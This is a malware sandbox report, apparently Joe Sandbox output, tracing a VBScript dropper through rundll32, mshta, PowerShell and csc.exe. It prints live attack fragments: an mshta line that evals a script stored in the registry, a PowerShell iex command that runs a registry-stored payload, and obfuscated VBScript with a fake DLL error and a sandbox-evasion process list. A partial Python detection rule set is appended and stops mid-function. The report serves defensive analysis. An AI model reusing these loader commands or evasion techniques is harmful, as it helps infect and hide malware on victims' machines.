Source: Yara match File source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC3276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 21_2_04BC3276

System Summary:

Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB2274 21_2_6FBB2274
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC7E30 21_2_04BC7E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC725F 21_2_04BC725F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC1754 21_2_04BC1754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E63570 21_2_05E63570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E490A1 21_2_05E490A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E45C88 21_2_05E45C88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E4FBA9 21_2_05E4FBA9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E543B9 21_2_05E543B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E57B5D 21_2_05E57B5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5DAED 21_2_05E5DAED
Source: C:\Windows\System32\control.exe Code function: 32_2_00CBB948 32_2_00CBB948
Source: C:\Windows\System32\control.exe Code function: 32_2_00CBB230 32_2_00CBB230
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA70C8 32_2_00CA70C8
Source: C:\Windows\System32\control.exe Code function: 32_2_00C990FC 32_2_00C990FC
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB88B8 32_2_00CB88B8
Source: C:\Windows\System32\control.exe Code function: 32_2_00C91000 32_2_00C91000
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA7820 32_2_00CA7820
Source: C:\Windows\System32\control.exe Code function: 32_2_00CAA9F8 32_2_00CAA9F8
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA6944 32_2_00CA6944
Source: C:\Windows\System32\control.exe Code function: 32_2_00CAE95C 32_2_00CAE95C
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA4150 32_2_00CA4150
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA1164 32_2_00CA1164
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB5164 32_2_00CB5164
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA0124 32_2_00CA0124
Source: C:\Windows\System32\control.exe Code function: 32_2_00C92138 32_2_00C92138
Source: C:\Windows\System32\control.exe Code function: 32_2_00C99AD8 32_2_00C99AD8
Source: C:\Windows\System32\control.exe Code function: 32_2_00CABA74 32_2_00CABA74
Source: C:\Windows\System32\control.exe Code function: 32_2_00C9ABDC 32_2_00C9ABDC
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB4BA0 32_2_00CB4BA0
Source: C:\Windows\System32\control.exe Code function: 32_2_00CBA3A4 32_2_00CBA3A4
Source: C:\Windows\System32\control.exe Code function: 32_2_00C91348 32_2_00C91348
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA8340 32_2_00CA8340
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB4354 32_2_00CB4354
Source: C:\Windows\System32\control.exe Code function: 32_2_00C94B60 32_2_00C94B60
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB730C 32_2_00CB730C
Source: C:\Windows\System32\control.exe Code function: 32_2_00CAD328 32_2_00CAD328
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA4484 32_2_00CA4484
Source: C:\Windows\System32\control.exe Code function: 32_2_00C974A4 32_2_00C974A4
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB9408 32_2_00CB9408
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB3400 32_2_00CB3400
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB4DE0 32_2_00CB4DE0
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA1DF4 32_2_00CA1DF4
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA559C 32_2_00CA559C
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA5DBC 32_2_00CA5DBC
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA9500 32_2_00CA9500
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA2EC0 32_2_00CA2EC0
Source: C:\Windows\System32\control.exe Code function: 32_2_00CAC6C4 32_2_00CAC6C4
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB5ED8 32_2_00CB5ED8
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB2EF8 32_2_00CB2EF8
Source: C:\Windows\System32\control.exe Code function: 32_2_00C976F4 32_2_00C976F4
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA6684 32_2_00CA6684
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB6EA0 32_2_00CB6EA0
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB06B4 32_2_00CB06B4
Source: C:\Windows\System32\control.exe Code function: 32_2_00C93610 32_2_00C93610
Source: C:\Windows\System32\control.exe Code function: 32_2_00CAA790 32_2_00CAA790
Source: C:\Windows\System32\control.exe Code function: 32_2_00CAF7B4 32_2_00CAF7B4
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5FEAB CreateProcessAsUserW, 21_2_05E5FEAB
Java / VBScript file with very long strings (likely obfuscated code)
Source: presentation[2021.09.09_15-26].vbs Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB1382 GetProcAddress,NtCreateSection,memset, 21_2_6FBB1382
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB14FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 21_2_6FBB14FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB1B4A NtMapViewOfSection, 21_2_6FBB1B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB2495 NtQueryVirtualMemory, 21_2_6FBB2495
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC6EB3 GetProcAddress,NtCreateSection,memset, 21_2_04BC6EB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC40DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 21_2_04BC40DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC7666 NtMapViewOfSection, 21_2_04BC7666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC8055 NtQueryVirtualMemory, 21_2_04BC8055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E609D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 21_2_05E609D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 21_2_05E5B58C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5A8F7 NtMapViewOfSection, 21_2_05E5A8F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E58890 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 21_2_05E58890
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5B878 GetProcAddress,NtCreateSection,memset, 21_2_05E5B878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E55878 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 21_2_05E55878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5F7F5 NtQueryInformationProcess, 21_2_05E5F7F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E437F6 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 21_2_05E437F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E6079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 21_2_05E6079B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5A71C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 21_2_05E5A71C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E56657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 21_2_05E56657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E50E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 21_2_05E50E3E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E555D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 21_2_05E555D6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E45166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 21_2_05E45166
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E49D36 NtGetContextThread,RtlNtStatusToDosError, 21_2_05E49D36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E50CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 21_2_05E50CEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E60BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 21_2_05E60BAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E50FBD memset,NtQueryInformationProcess, 21_2_05E50FBD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 21_2_05E5FBB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E4579C NtQuerySystemInformation,RtlNtStatusToDosError, 21_2_05E4579C
Source: C:\Windows\System32\control.exe Code function: 32_2_00CBA8F0 NtSetInformationProcess,CreateRemoteThread, 32_2_00CBA8F0
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose, 32_2_00CB20A4
Source: C:\Windows\System32\control.exe Code function: 32_2_00CAE860 NtQueryInformationProcess, 32_2_00CAE860
Source: C:\Windows\System32\control.exe Code function: 32_2_00CCF029 NtProtectVirtualMemory,NtProtectVirtualMemory, 32_2_00CCF029
Source: C:\Windows\System32\control.exe Code function: 32_2_00CCF36B NtProtectVirtualMemory, 32_2_00CCF36B
PE file does not import any functions
Source: tjafqng0.dll.27.dr Static PE information: No import functions for PE file found
Source: qlsida3o.dll.29.dr Static PE information: No import functions for PE file found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210913 Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winVBS@22/20@6/1
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation[2021.09.09_15-26].vbs'
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation[2021.09.09_15-26].vbs'
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDDD0.tmp' 'c:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESEAC0.tmp' 'c:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDDD0.tmp' 'c:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESEAC0.tmp' 'c:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP' Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC2102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 21_2_04BC2102
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{7626F90B-5DEB-18F5-970A-E1CCBBDEA5C0}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5008:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{C659AAB4-6D66-E894-275A-F19C4B2EB590}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{3E61FFA3-8597-20A3-FF52-8954A3A6CDC8}
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: presentation[2021.09.09_15-26].vbs Static file information: File size 1409283 > 1048576
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdbXP source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdbXP source: powershell.exe, 00000019.00000002.1238604024.000001B6D76F8000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.1013379730.000001BA25DFD000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000002.1193389238.000000006FBF4000.00000002.00020000.sdmp, fum.cpp.0.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = 
Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
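Detection logic for the execution chain the process-creation lines above record (WMI-spawned rundll32 loading a .cpp-named module, an inline HTA that reads the next stage from HKCU\Software\AppDataLow, PowerShell running iex on that registry value, and csc.exe compiling from %TEMP%). This is an added example, not Joe Sandbox code; the event shape (parent_image, image, command_line) is an assumption modelled on Sysmon Event ID 1, and the sample events are constructed from the command lines in this report with the parents of the root processes filled in as assumptions.

```python
"""Process-creation rules for the chain in this report. Added example, not
Joe Sandbox code. Event fields follow Sysmon Event ID 1 (assumption);
SAMPLE_EVENTS are constructed from the report's command lines."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
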